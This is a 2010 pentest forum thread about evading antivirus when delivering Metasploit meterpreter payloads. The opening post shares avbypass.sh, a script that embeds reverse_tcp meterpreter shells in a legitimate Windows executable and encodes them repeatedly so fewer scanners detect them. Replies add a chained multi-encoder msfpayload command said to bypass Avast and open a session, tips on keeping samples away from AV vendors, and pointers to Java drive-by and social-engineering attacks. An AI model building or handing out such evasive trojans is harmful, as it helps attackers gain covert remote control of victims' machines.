Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Script 4 AV bypass meterpreters

  1. #1
    Junior Member pigtail23's Avatar
    Join Date
    Jun 2010
    Location
    black hole
    Posts
    41

    Default Script 4 AV bypass meterpreters

    avbypass.sh creates a number of files to bypass a AV engine. The most AV engines find an trojan in the meterpreter file. avbypass.sh is a simple script that use another .exe to hide the trojan in the file an encode it x-times. It is interesting to see for example you encode it two times and VirusTotal - Free Online Virus and Malware Scan reported 5/41 scanners found a trojan, you encode it 3 times and virustotal.com reported 7/41 scanners found a trojan. So this script create an x-number of files that you can check on Jotti's malware scan (19 AV scanners) or VirusTotal - Free Online Virus and Malware Scan (41 AV scanners).

    use the script like #sh avbypass.sh 10.0.0.1 2222 4 /root/testfile

    Code:
    #!/bin/sh
    # (C)opyright 2010 - pigtail23
    # AVbypass Creator v. 1.0 (2010-06-06)
    #msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x -->>> /pentest/windows-binaries/tools/tftpd32.exe <<<-- -t exe > $4$c.exe
    #/pentest/windows-binaries/tools/tftpd32.exe <--- you can use a file of your choise
    
    echo "sh avbypass.sh <IP> <Port> <Number of times to encode> <Filename>"
    
    if [[  $1 ]]; then echo "IP:" $1 ; else echo "IP not set"; exit 0; fi
    if [[  $2 ]]; then echo "Port:" $2 ; else echo "Port not set"; exit 0; fi
    if [[  $3 ]]; then echo "Number:" $3 ; else echo "Set Number"; exit 0; fi
    if [[  $4 ]]; then echo "Filename:" $4 ; else echo "Set Filename"; exit 0; fi
    echo "File/-s creating. Pls Wait..."
    
    for (( c=1; c<=$3; c++ ))
    do
    
    	msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x /pentest/windows-binaries/tools/tftpd32.exe -t exe > $4$c.exe
    
    echo "File" $4$c".exe was created."
    
    done
    I hope this script help you to check and create your files faster.
    and sry for my bad english.



    pigtail23

    in the next time will come an update that automate the upload to virustotal. have fun ;D
    Last edited by Archangel-Amael; 06-14-2010 at 06:00 PM.

  2. #2
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    5

    Default Re: Script 4 AV bypass meterpreters

    awesome script i like that.
    i have playing aroung with av evasion on metasploit for some month.
    but i dont get my file detected under 5 av products. i dont know why.
    i have testes out many options, i encoded it in a chain but no effect.
    i like that,so i will test out your script.
    ähhm how to get my file encoded with more tan 2 encoders.
    sometimes my new encoded executable is broken...

    do you have any idea?

    SilentShadow

  3. #3
    Junior Member
    Join Date
    Feb 2006
    Posts
    25

    Default Re: Script 4 AV bypass meterpreters

    Thanks for sharing this nice script that speeds things up.
    I have found however, some mixed results. In one case the resulting exe was indeed able to bypass most AVs and execute without a problem. However, after a few minutes the exe just cleanly exited. I tested it on an XP SP3 machine and noticed the original windows file runs normally and only exits if you forcefully kill it. The msfencoded binary however exits on its own.
    Strange behavior that I can't logically figure out. Any thoughts?
    I guess the double encoding somehow adds this annoying bug. Otherwise perfect.

  4. #4
    Junior Member
    Join Date
    Feb 2006
    Posts
    25

    Default Re: Script 4 AV bypass meterpreters

    Quote Originally Posted by SilentShadow View Post
    awesome script i like that.
    i
    ähhm how to get my file encoded with more tan 2 encoders.

    do you have any idea?

    SilentShadow
    I think you can pipe it | through multiple times although it may break the final binary. Try it and let us know if it worked for you.

  5. #5
    Junior Member pigtail23's Avatar
    Join Date
    Jun 2010
    Location
    black hole
    Posts
    41

    Default Re: Script 4 AV bypass meterpreters

    yes it work with | ...

  6. #6
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default Re: Script 4 AV bypass meterpreters

    If you use either of those sites your files will be distributed to the AV companies and will become detected.

    This site has an option not to distribute, whether they stick by it I don't know: scanner.novirusthanks.org

  7. #7
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Script 4 AV bypass meterpreters

    Code:
    cd /pentest/exploits/framework3
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26 LPORT=1417 R | msfencode -e 
    x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e 
    x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 
    16 -t exe > /root/msfpayload.exe
    Here is my example of a successful multi encode. Not so sure it accomplishes THAT much. Seems once you've got it encoded to a certain point it won't matter as most AV that is still detecting it is doing so by heuristics engine(behaviour?) Correct me if I'm wrong. Definitely still learning.

    This much encoding broke my exe when I tried on bt4-pre-final (metasploit up to date).

    building payload using R1 and executing this payload on win7x64 got me meterpreter session.
    I did first build the payload with NO encoding to test against my AV(avast free). Avast picks up the meterpreter payload unencoded. Attempt two using the above command successfully bypassed. Again not sure if that much encoding is really needed but just an example what you can do with the command.
    Last edited by iproute; 09-18-2010 at 10:56 PM.

  8. #8
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    4

    Default Re: Script 4 AV bypass meterpreters

    i'm encoding ten times but still AVG can detect it. So encoding can't by pass AV fully any other way-out??

  9. #9
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Script 4 AV bypass meterpreters

    Yeah AVG almost always picks up the payloads. I've had difficulty getting them past AVG, and a couple of others. Encoding doesn't seem to help.
    I've really gotta say that I don't think exe payloads are really the best way to get into something anyway. Great tool, but you're much better off with some sort of exploit rather than relying on a client side attack IMHO. I suppose it depends on how practiced at social engineering you are.

    A java drive-by is not detected by AV as I recall. The social engineering toolkit has this attack type scripted, very handy. It's also all there in metasploit for setting up manually.

    As always "Pick the lowest hanging fruit first!" and "Try Harder!"

  10. #10
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: Script 4 AV bypass meterpreters

    Quote Originally Posted by iproute View Post
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26 LPORT=1417 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe

    Here is my example of a successful multi encode. Not so sure it accomplishes THAT much. Seems once you've got it encoded to a certain point it won't matter as most AV that is still detecting it is doing so by heuristics engine(behaviour?) Correct me if I'm wrong. Definitely still learning.

    This much encoding broke my exe when I tried on bt4-pre-final (metasploit up to date).

    building payload using R1 and executing this payload on win7x64 got me meterpreter session.
    I did first build the payload with NO encoding to test against my AV(avast free). Avast picks up the meterpreter payload unencoded. Attempt two using the above command successfully bypassed. Again not sure if that much encoding is really needed but just an example what you can do with the command.
    Cann see that your using alot of diff encoder. i have been looking every where to find a command that will list these encoders (currently 27) du you know how?

Page 1 of 2 12 LastLast

Similar Threads

  1. msf encode av bypass works
    By pentest09 in forum Beginners Forum
    Replies: 3
    Last Post: 06-12-2010, 04:19 PM
  2. Bypass web logon pages
    By pigtail in forum Beginners Forum
    Replies: 5
    Last Post: 05-13-2010, 05:31 AM
  3. Using a CD to bypass no boot from USB BIOS
    By disturbed in forum OLD Newbie Area
    Replies: 11
    Last Post: 02-05-2010, 11:24 AM
  4. Bypass safe mode
    By xpleet in forum OLD Pentesting
    Replies: 8
    Last Post: 05-01-2009, 08:35 PM
  5. proxy bypass java?
    By cerebus in forum OLD Newbie Area
    Replies: 2
    Last Post: 11-14-2008, 12:30 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •